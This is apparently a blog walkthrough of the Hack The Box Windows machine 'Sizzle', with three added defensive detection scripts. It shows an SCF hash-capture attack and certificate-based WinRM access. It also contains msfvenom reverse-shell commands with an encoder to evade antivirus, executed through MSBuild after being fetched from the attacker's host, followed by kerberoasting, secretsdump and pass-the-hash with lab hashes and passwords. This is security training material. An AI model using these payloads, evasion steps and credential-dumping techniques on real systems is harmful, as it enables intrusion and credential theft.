Sizzle was a great machine, everything was great. It was very realistic, fun and of course challenging. Personally one of my favorites and one of the best Active Directory boxes I have ever solved. It starts with getting write access to a folder in an SMB share; a simple SCF file attack with responder and john gives me a password for a user. With that password, I was able to generate a certificate request, get a certificate and then a WinRM session. After that comes the most challenging part of the box: bypassing antivirus, kerberoasting, and privilege escalation. But before we do that, we’ll take a look at an unintended route first. That was the box in short. It’s a Windows box and the IP is 10.10.10.103; I added it to /etc/hosts as sizzle.htb.
Nmap
As always, first an nmap scan:
root@kali:~/htb/sizzle# nmap -sV -sT -sC sizzle.htb
Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-02 06:30 EST
Nmap scan report for sizzle.htb (10.10.10.103)
Host is up (0.12s latency).
Not shown: 990 filtered ports
PORT     STATE SERVICE       VERSION
21/tcp   open  ftp           Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
|_  SYST: Windows_NT
53/tcp   open  domain?
| fingerprint-strings:
|   DNSVersionBindReqTCP:
|     version
|_    bind
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: HTB.LOCAL, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=sizzle.HTB.LOCAL
| Subject Alternative Name: othername:<unsupported>, DNS:sizzle.HTB.LOCAL
| Not valid before: 2020-01-02T11:22:14
|_Not valid after:  2021-01-01T11:22:14
|_ssl-date: 2020-01-02T11:35:10+00:00; +1m11s from scanner time.
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: HTB.LOCAL, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=sizzle.HTB.LOCAL
| Subject Alternative Name: othername:<unsupported>, DNS:sizzle.HTB.LOCAL
| Not valid before: 2020-01-02T11:22:14
|_Not valid after:  2021-01-01T11:22:14
|_ssl-date: 2020-01-02T11:35:09+00:00; +1m11s from scanner time.
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: HTB.LOCAL, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=sizzle.HTB.LOCAL
| Subject Alternative Name: othername:<unsupported>, DNS:sizzle.HTB.LOCAL
| Not valid before: 2020-01-02T11:22:14
|_Not valid after:  2021-01-01T11:22:14
|_ssl-date: 2020-01-02T11:35:09+00:00; +1m11s from scanner time.
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=1/2%Time=5E0DD478%P=x86_64-pc-linux-gnu%r(DNSVe
SF:rsionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\x
SF:04bind\0\0\x10\0\x03");
Service Info: Host: SIZZLE; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 1m10s, deviation: 0s, median: 1m10s
| smb2-security-mode:
|   2.02:
|_    Message signing enabled and required
| smb2-time:
|   date: 2020-01-02T11:34:31
|_  start_date: 2020-01-02T11:31:19
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 228.22 seconds
root@kali:~/htb/sizzle#
We have many ports: ftp on port 21, dns on port 53, http on port 80, smb and ldap. We also see that the domain is HTB.LOCAL and the commonName is sizzle.htb.local, so I added it to /etc/hosts:
HTTP
I checked the http server and the index only had this gif:
Then I ran gobuster and DirB:
root@kali:~/htb/sizzle# gobuster dir -u http://10.10.10.103 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 40
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.103
[+] Threads:        40
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/01/02 06:33:35 Starting gobuster
===============================================================
/images (Status: 301)
/Images (Status: 301)
/IMAGES (Status: 301)
root@kali:~/htb/sizzle# dirb http://10.10.10.103
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Thu Jan  2 07:48:37 2020
URL_BASE: http://10.10.10.103/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://10.10.10.103/ ----
==> DIRECTORY: http://10.10.10.103/aspnet_client/
==> DIRECTORY: http://10.10.10.103/certenroll/
+ http://10.10.10.103/certsrv (CODE:401|SIZE:1293)
/certenroll seems interesting, but access is unfortunately forbidden:
Time to check smb.
SMB, SCF File Attack, Amanda’s Credentials
The first thing we need to know is which shares exist; we can use smbclient to list them:
smbclient --list //sizzle.htb/ -U ""
I noticed that there was a share for Active Directory Certificate Services. Most likely /certsrv is on the web server:
http://sizzle.htb/certsrv
root@kali:~/htb# smbclient //sizzle.htb/"Department Shares" -U ""
WARNING: The "syslog" option is deprecated
Enter WORKGROUP\'s password:
Try "help" to get a list of possible commands.
smb: \>
There were many directories, but 2 that allowed writing: ZZ_ARCHIVE and Users/Public.
We are looking for references. Since we can write to any of the folders, we may be able to apply an SCF file attack. You can read about it here. We are going to put an SCF file in Users/Public. It looks like this:
Then we will run responder. When a user browses that folder, their machine automatically tries to connect to my box via SMB, and that’s when responder catches the hashes. More info in the link above.
root@kali:/tmp# responder -I tun0
NBT-NS, LLMNR & MDNS Responder 2.3.4.0
-cut-
[+] Generic Options:
    Responder NIC              [tun0]
    Responder IP               [10.10.16.70]
    Challenge set              [random]
    Don't Respond To Names     ['ISATAP']
[+] Listening for events...
[SMB] NTLMv2-SSP Client   : 10.10.10.103
[SMB] NTLMv2-SSP Username : HTB\amanda
[SMB] NTLMv2-SSP Hash     : amanda::HTB:a6d23653a4821fc8:03851040934EDC44A5A58C61B9C048AE:
[*] Skipping previously captured hash for HTB\amanda
Responder captured a hash for a user named amanda. Let’s crack it with John:
The password is Ashare1972
Requesting a Certificate, WinRM Session as amanda
I tried to access certenroll as amanda and it worked fine:
root@kali:~/htb/sizzle# smbclient //sizzle.htb/"CertEnroll" -U amanda
Enter WORKGROUP\amanda's password: Ashare1972
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Tue Jun 30 13:47:19 2020
  ..                                  D        0  Tue Jun 30 13:47:19 2020
  HTB-SIZZLE-CA+.crl                  A      721  Tue Jun 30 13:47:19 2020
  HTB-SIZZLE-CA.crl                   A      909  Tue Jun 30 13:47:19 2020
  nsrev_HTB-SIZZLE-CA.asp             A      322  Mon Jul  2 16:36:05 2018
  sizzle.HTB.LOCAL_HTB-SIZZLE-CA.crt  A      871  Mon Jul  2 16:36:03 2018
So I went to /certsrv and used amanda’s credentials to authenticate.
Now it is time to get a certificate. But wait, what is the certificate for?
A full nmap scan shows that the WinRM ports are open:
nmap -p- -T5 -vvv --max-retries 1 sizzle.htb
nmap -p 5985,5986 -sV -sT -sC sizzle.htb
Port 5985 uses http while 5986 uses https. When I got the data from Amanda I tried to connect to port 5985 and it didn’t work, so we do it through port 5986, which is why we need a certificate. (If you don’t know how to connect via WinRM, we’ll get to that later.)
We’ll generate a certificate request and a private key:
openssl req -newkey rsa:2048 -nodes -keyout request.key -out request.csr
Then we will make an advanced certificate request, paste our request and download the certificate (base64 encoded).
Now we can use WinRM, but what is WinRM?
I used Alamot’s shell and added some lines for the certificate and key:
root@kali:~/htb/sizzle# cat htb-sizzle-winrm.rb
#!/usr/bin/ruby
require 'winrm'

# Author: Alamot

conn = WinRM::Connection.new(
  endpoint: 'https://10.10.10.103:5986/wsman',
  transport: :ssl,
  # Client certificate issued by /certsrv and the private key generated with openssl
  client_cert: '/root/htb/sizzle/certnew.cer',
  client_key: '/root/htb/sizzle/request.key',
  # Skips validation of the server's TLS certificate
  :no_ssl_peer_verification => true
)

command = ""

conn.shell(:powershell) do |shell|
  until command == "exit\n" do
    # Build a prompt from the remote user, computer name and current directory
    output = shell.run("-join($id,'PS ',$(whoami),'@',$env:computername,' ',$((gi $pwd).Name),'> ')")
    print(output.output.chomp)
    command = gets
    output = shell.run(command) do |stdout, stderr|
      STDOUT.print stdout
      STDERR.print stderr
    end
  end
  puts "Exiting with code #{output.exitcode}"
end
And it worked:
But there was no user.txt:
Stored NTLM Hashes, Secretsdump, Privilege Escalation
While enumerating the file system I found a file, file.txt, in C:\Windows\System32. That file had NTLM hashes for all users!
root@kali:~/htb/sizzle# ruby htb-sizzle-winrm.rb
PS htb\amanda@SIZZLE Documents> type C:\Windows\System32\file.txt
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:296ec447eee58283143efbd5d39408c8:::
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c718f548c75062ada93250db208d3178:::
Domain    User  ID  Hash
------    ----  --  ----
HTB.LOCAL Guest 501 -
amanda:1104:aad3b435b51404eeaad3b435b51404ee:7d0516ea4b6ed084f3fdf71c47d9beb3:::
mrb3n:1105:aad3b435b51404eeaad3b435b51404ee:bceef4f6fe9c026d1d8dec8dce48adef:::
mrlky:1603:aad3b435b51404eeaad3b435b51404ee:bceef4f6fe9c026d1d8dec8dce48adef:::
PS htb\amanda@SIZZLE Documents>
I honestly don’t know why. After resetting the machine, the file was still there. I don’t know if the creator made an accidental mistake, but at least let’s see how we can use that.
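Seen from the defender's side, a dump in this `user:rid:lmhash:nthash:::` layout can be audited without cracking anything. The following is an added example, not part of the original write-up: it flags blank passwords, stored LM hashes and accounts that share one NT hash (as mrb3n and mrlky do in file.txt above). The sample input is constructed and its account names and non-empty hash values are placeholders.

```python
from collections import defaultdict

# Well-known LM and NT hashes of the empty string.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"
HEX = set("0123456789abcdef")

# Constructed sample in the layout of file.txt; the hashes are placeholders.
SAMPLE = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:11111111111111111111111111111111:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Domain    User  ID  Hash
------    ----  --  ----
alice:1104:aad3b435b51404eeaad3b435b51404ee:22222222222222222222222222222222:::
bob:1105:aad3b435b51404eeaad3b435b51404ee:33333333333333333333333333333333:::
carol:1603:aad3b435b51404eeaad3b435b51404ee:33333333333333333333333333333333:::
legacy:1700:0123456789abcdef0123456789abcdef:44444444444444444444444444444444:::
"""


def parse_dump(text):
    """Yield (user, rid, lm, nt) for well-formed entries; skip banners and table rows."""
    for line in text.splitlines():
        parts = line.strip().split(":")
        if len(parts) < 4 or not parts[1].isdigit():
            continue
        lm, nt = parts[2].lower(), parts[3].lower()
        if len(lm) == 32 and len(nt) == 32 and set(lm + nt) <= HEX:
            yield parts[0], int(parts[1]), lm, nt


def audit(text):
    """Group accounts by NT hash and report weak-credential findings."""
    by_nt = defaultdict(list)
    findings = {"blank_password": [], "lm_hash_stored": [], "shared_password": []}
    for user, _rid, lm, nt in parse_dump(text):
        by_nt[nt].append(user)
        if nt == EMPTY_NT:
            findings["blank_password"].append(user)
        if lm != EMPTY_LM:
            # A real LM hash means the weak legacy format is still being stored.
            findings["lm_hash_stored"].append(user)
    # Identical NT hashes mean identical passwords: NT hashes are unsalted.
    findings["shared_password"] = sorted(
        sorted(users) for nt, users in by_nt.items()
        if len(users) > 1 and nt != EMPTY_NT
    )
    return findings


if __name__ == "__main__":
    for name, value in audit(SAMPLE).items():
        print(name, value)
```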
That admin hash was useless, I tried with SMB, I cracked it, tried Psexec. It did not work. I cracked mrlky’s hash:
The password was Football#7. I used it with secretsdump.py from impacket and got another hash from the administrator:
root@kali:~/htb# secretsdump.py -just-dc mrlky@sizzle.htb.local
Impacket v0.9.22.dev1+20200629.145357.5d4ad6cc - Copyright 2020 SecureAuth Corporation
Password:Football#7
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[*] Kerberos keys grabbed
[*] Cleaning up...
It wasn’t cracking. I tried the psexec metasploit module and for some reason it didn’t work, so I used the hash with smb to access C$ and then downloaded the flags.
root@kali:~/htb/sizzle# smbclient //sizzle.htb/C$ -U "Administrator" --pw-nt-hash f6b7160bfc91823792e0ac3a162c9267
Try "help" to get a list of possible commands.
smb: \> cd users
smb: \users\> cd administrator
smb: \users\administrator\> cd desktop
smb: \users\administrator\desktop\> ls
  .                 DR        0  Tue Jul 10 18:24:52 2018
  ..                DR        0  Tue Jul 10 18:24:52 2018
  desktop.ini      AHS      282  Mon Jul  2 23:00:22 2018
  root.txt           A       32  Tue Jul 10 18:24:58 2018
smb: \users\administrator\desktop\>
Now forget that we saw that, let’s try something more realistic.
Backtrack
Back to the WinRM session as amanda, let’s examine our environment.
There was AppLocker:
Antivirus:
We were even in Constrained Language Mode in PowerShell:
Since this was an Active Directory environment I wanted to do kerberoasting, but Invoke-Kerberoast.ps1 needed Full Language Mode, and I couldn’t use GetUserSPNs.py because the services were internal only. My attempts to evade the antivirus also failed. I could bypass the constrained language mode with PSByPassCLM and still couldn’t use Invoke-Kerberoast.ps1. AppLocker is easy to bypass so it wasn’t an issue. But I had to bypass the antivirus.
Bypassing AV
CLM / AppLocker Break Out
Enumeration
The shell I have is quite limited. I can see that I’m in constrained language mode, and that AppLocker is limiting what I can run.
PS htb\amanda@SIZZLE v2.0.50727> $executioncontext.sessionstate.languagemode
ConstrainedLanguage
PS htb\amanda@SIZZLE Documents> Get-AppLockerPolicy -Effective -XML
I found this article and this POC
The first time, I created the payload like this:
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=10.10.xx.xx LPORT=1339 -f csharp
And I added the shellcode to the POC and applied the exploit:
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe c:\windows\system32\spool\drivers\color\shellcode.xml
The antivirus detected it. I added an encoder and 100 iterations and tried again:
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=10.10.xx.xx LPORT=1339 -e x86/shikata_ga_nai -i 100 -f csharp
Then I added the shellcode to shellcode.xml: https://github.com/puckiestyle/pentest/blob/master/shellcode.xml
root@kali:~/htb/sizzle# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.103 - - [02/Jan/2020 09:45:17] "GET /shellcode.xml HTTP/1.1" 200 -
PS htb\amanda@SIZZLE color> Invoke-WebRequest -o shellcode.xml http://10.10.16.70/shellcode.xml
PS htb\amanda@SIZZLE color> c:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe c:\windows\system32\spool\drivers\color\shellcode.xml
Microsoft (R) Build Engine version 4.6.1586.0
[Microsoft .NET Framework, version 4.0.30319.42000]
Copyright (C) Microsoft Corporation. All rights reserved.
Build started 1/2/2020 9:52:59 AM.
This time it worked, and I got a meterpreter session!
msf5 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 10.10.16.70:1339
[*] Sending stage (179779 bytes) to 10.10.10.103
[*] Meterpreter session 1 opened (10.10.16.70:1339 -> 10.10.10.103:57175) at 2020-01-02 09:51:50 -0500
meterpreter > sysinfo
Computer        : SIZZLE
OS              : Windows 2016 (Build 14393).
Architecture    : x64
System Language : en_US
Meterpreter     : x86/windows
meterpreter >
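The MSBuild step above stands out in process-creation telemetry even when the payload itself evades the antivirus. The following is an added detection example, not part of the original write-up: it reviews MSBuild launches for a project file in a user-writable directory, an unusual project extension and an unexpected parent process. The watch lists, the sample records and the wsmprovhost.exe parent for the WinRM session are assumptions.

```python
import ntpath
import re

# Assumed watch list of user-writable directories; the first is the one used in the post.
WRITABLE_DIRS = (
    r"c:\windows\system32\spool\drivers\color",
    r"c:\windows\tasks",
    r"c:\windows\temp",
    r"c:\users\public",
)
PROJECT_EXTS = {".csproj", ".vbproj", ".vcxproj", ".sln", ".proj", ".targets"}
EXPECTED_PARENTS = {"devenv.exe", "msbuild.exe", "dotnet.exe"}  # assumption, tune per site
TOKEN = re.compile(r'"([^"]*)"|(\S+)')


def project_argument(command_line):
    """Return the first argument after the image that is not a /switch or -switch."""
    tokens = [quoted or bare for quoted, bare in TOKEN.findall(command_line)]
    for token in tokens[1:]:
        if not token.startswith(("/", "-")):
            return token
    return None


def review(event):
    """Return the reasons an MSBuild launch looks like code execution, not a build."""
    if ntpath.basename(event["Image"]).lower() != "msbuild.exe":
        return []
    reasons = []
    project = project_argument(event["CommandLine"])
    if project:
        folder = ntpath.dirname(ntpath.normpath(project)).lower()
        if any(folder == d or folder.startswith(d + "\\") for d in WRITABLE_DIRS):
            reasons.append("project file in user-writable directory")
        if ntpath.splitext(project)[1].lower() not in PROJECT_EXTS:
            reasons.append("unusual project file extension")
    parent = ntpath.basename(event["ParentImage"]).lower()
    if parent not in EXPECTED_PARENTS:
        reasons.append("unexpected parent process: " + parent)
    return reasons


# Constructed process-creation records using Sysmon event ID 1 field names.
EVENTS = [
    {"User": r"HTB\amanda", "ParentImage": r"C:\Windows\System32\wsmprovhost.exe",
     "Image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe",
     "CommandLine": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "
                    r"c:\windows\system32\spool\drivers\color\shellcode.xml"},
    {"User": r"HTB\builder", "ParentImage": r"C:\VS\Common7\IDE\devenv.exe",
     "Image": r"C:\VS\MSBuild\Current\Bin\MSBuild.exe",
     "CommandLine": r'"C:\VS\MSBuild\Current\Bin\MSBuild.exe" /nologo "C:\src\app\app.csproj"'},
]


def flagged(events):
    """Return (user, reasons) for every event with at least one finding."""
    return [(e["User"], review(e)) for e in events if review(e)]


if __name__ == "__main__":
    for user, reasons in flagged(EVENTS):
        print(user, reasons)
```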
Kerberoasting, Privilege Escalation
Now that we have a meterpreter session, we can route the internal subnet, use a proxy, then use GetUserSPNs.py and see if any user is kerberoastable.
The first thing is to configure proxychains to use port 8080:
/etc/proxychains.conf
Then we will use auxiliary/server/socks4a to add the route and set up the proxy:
route add 10.10.10.0 255.255.255.0 1
This adds a route for the whole internal subnet, where 1 is the session number.
Now we are ready. Let’s kerberoast!
root@kali:~/htb/sizzle# proxychains GetUserSPNs.py -request -dc-ip 10.10.10.103 HTB.LOCAL/amanda:Ashare1972
ProxyChains-3.1 (http://proxychains.sf.net)
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation
|S-chain|-<>-127.0.0.1:9050-<><>-10.10.10.103:389-<><>-OK
ServicePrincipalName  Name   MemberOf                                               PasswordLastSet             LastLogon
--------------------  -----  -----------------------------------------------------  --------------------------  --------------------------
http/sizzle           mrlky  CN=Remote Management Users,CN=Builtin,DC=HTB,DC=LOCAL  2018-07-10 14:08:09.536421  2018-07-12 10:23:50.871575
|S-chain|-<>-127.0.0.1:9050-<><>-10.10.10.103:88-<><>-OK
|S-chain|-<>-127.0.0.1:9050-<><>-10.10.10.103:88-<><>-OK
|S-chain|-<>-127.0.0.1:9050-<><>-10.10.10.103:88-<><>-OK
root@kali:~/htb/sizzle#
User mrlky was kerberoastable and we have a hash, let’s give this to john:
root@kali:~/htb/sizzle# john --wordlist=/usr/share/wordlists/rockyou.txt mrlky.hash
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Football#7       (?)
1g 0:00:00:20 DONE (2020-01-02 10:16) 0.04780g/s 533806p/s 533806c/s 533806C/s Forever29Life05..Fokatrepa
Use the "--show" option to display all of the cracked passwords reliably
Session completed
The password is Football#7, now we can reuse secretsdump.py and do the same as before:
root@kali:~/htb/sizzle# secretsdump.py sizzle.htb.local/mrlky:Football#7@sizzle.htb.local
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[*] Kerberos keys grabbed
[*] Cleaning up...
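The Kerberoasting step above leaves a trace on the domain controller: john identified the ticket as etype 23 (RC4), and an RC4 service ticket for a user-backed account such as mrlky is what a detection rule on event 4769 looks for. The following is an added example, not part of the original write-up; it also generalizes to a volume check for SPN sweeps, which a single request like the one here would not trip. All records are constructed, and svc_scan, sqlsvc, websvc and backupsvc are hypothetical accounts.

```python
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = 0x17  # etype 23, the type john reported for the mrlky ticket


def ev(ts, requester, service, etype, status="0x0"):
    # Field names follow Windows Security event 4769; every record is constructed.
    return {"TimeCreated": datetime.fromisoformat(ts), "TargetUserName": requester,
            "ServiceName": service, "TicketEncryptionType": etype, "Status": status}


EVENTS = [
    ev("2020-01-02T15:10:01", "amanda@HTB.LOCAL", "SIZZLE$", "0x12"),
    ev("2020-01-02T15:12:40", "amanda@HTB.LOCAL", "mrlky", "0x17"),
    ev("2020-01-02T15:13:02", "SIZZLE$@HTB.LOCAL", "krbtgt", "0x12"),
    ev("2020-01-02T15:20:00", "svc_scan@HTB.LOCAL", "sqlsvc", "0x17"),
    ev("2020-01-02T15:20:05", "svc_scan@HTB.LOCAL", "websvc", "0x17"),
    ev("2020-01-02T15:20:09", "svc_scan@HTB.LOCAL", "backupsvc", "0x17"),
    ev("2020-01-02T15:21:00", "amanda@HTB.LOCAL", "sqlsvc", "0xffffffff", "0x1b"),
]


def rc4_user_service_tickets(events):
    """Successful TGS requests that returned an RC4 ticket for a user-backed service."""
    hits = []
    for e in events:
        service = e["ServiceName"]
        requester = e["TargetUserName"].split("@")[0]
        if e["Status"] != "0x0" or int(e["TicketEncryptionType"], 16) != RC4_HMAC:
            continue
        if service.endswith("$") or service.lower() == "krbtgt":
            continue  # machine accounts and krbtgt use long random keys
        if requester.lower() == service.lower():
            continue  # an account requesting a ticket to itself
        hits.append((e["TimeCreated"], requester, service))
    return hits


def sweeps(events, window=timedelta(seconds=60), threshold=3):
    """Requesters with RC4 tickets for >= threshold distinct services in one window."""
    per_user = defaultdict(list)
    for ts, requester, service in rc4_user_service_tickets(events):
        per_user[requester].append((ts, service))
    flagged = {}
    for requester, items in per_user.items():
        items.sort()
        for i, (start, _service) in enumerate(items):
            services = {s for t, s in items[i:] if t - start <= window}
            if len(services) >= threshold:
                flagged[requester] = sorted(services)
                break
    return flagged


if __name__ == "__main__":
    for ts, requester, service in rc4_user_service_tickets(EVENTS):
        print(ts.isoformat(), requester, "->", service)
    print(sweeps(EVENTS))
```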
That is it!
Author – Puckiestyle